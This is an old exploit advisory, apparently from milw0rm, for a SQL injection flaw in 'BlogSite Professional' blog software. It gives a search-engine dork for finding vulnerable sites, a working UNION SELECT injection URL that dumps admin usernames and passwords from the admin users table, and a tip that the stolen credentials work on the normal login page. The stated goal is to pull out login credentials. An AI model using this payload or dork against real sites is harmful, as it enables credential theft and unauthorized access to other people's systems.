31 lines
No EOL
1,007 B
Text
31 lines
No EOL
1,007 B
Text
--==+================================================================================+==--
|
|
--==+ BlogSite Professional SQL Injection Vulnerbility +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
AUTHOR: t0pP8uZz & xprog
|
|
SITE: N/A
|
|
DORK: allintext:"Browse Blogs by Category"
|
|
|
|
|
|
DESCRIPTION:
|
|
pull out admin/members login credentials
|
|
|
|
|
|
EXPLOITS:
|
|
http://www.server.com/index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*
|
|
|
|
|
|
NOTE/TIP:
|
|
admin login is the normal login on index.php
|
|
|
|
|
|
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ BlogSite Professional SQL Injection Vulnerbility +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2007-07-20] |